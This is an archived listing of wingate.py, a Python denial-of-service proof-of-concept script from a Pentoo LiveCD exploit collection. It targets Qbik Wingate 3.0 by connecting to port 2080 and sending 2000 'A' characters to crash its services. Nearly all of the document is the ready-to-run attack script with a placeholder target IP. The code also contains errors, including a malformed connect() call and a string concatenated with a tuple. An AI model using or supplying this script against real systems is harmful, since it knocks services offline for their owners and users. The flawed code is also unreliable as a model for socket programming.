home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / wingate / wingate.py < prev   
Text File  |  2005-02-12  |  800b  |  37 lines

  1.  
  2. #!/usr/bin/python
  3. #
  4. # Qbik Wingate 3.0 DoS Proof of Concept Code.
  5. # Vulnerability Discovered by eEye Digital Security
  6. Team(http://www.eEye.com)
  7. # Simple Script by Prizm(Prizm@Resentment.org)
  8. # By connecting to port 2080 on a system running Qbik Wingate 3.0 and
  9. # sending 2000
  10. # characters, all wingate services will crash.
  11. # *Solution* Upgrade to 4.0.1, version is not vulnerable to this Denial of
  12. # Service attack. 
  13. #
  14. # This *simple* little script will crash all wingate services.
  15.  
  16.  
  17. import socket
  18. import sys
  19. from string import strip
  20.  
  21. host="xxx.xxx.xxx.xxx" # Replace x's with IP.
  22. port=2080
  23. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  24.  
  25. try:
  26.   s.connect(host,port)
  27.   print "connection succeeded."
  28. except socket.error, e:
  29.   print "connection failed, " + e.args
  30.  
  31. s.send("A" * 2000)
  32.  
  33. #end
  34.  
  35.  
  36.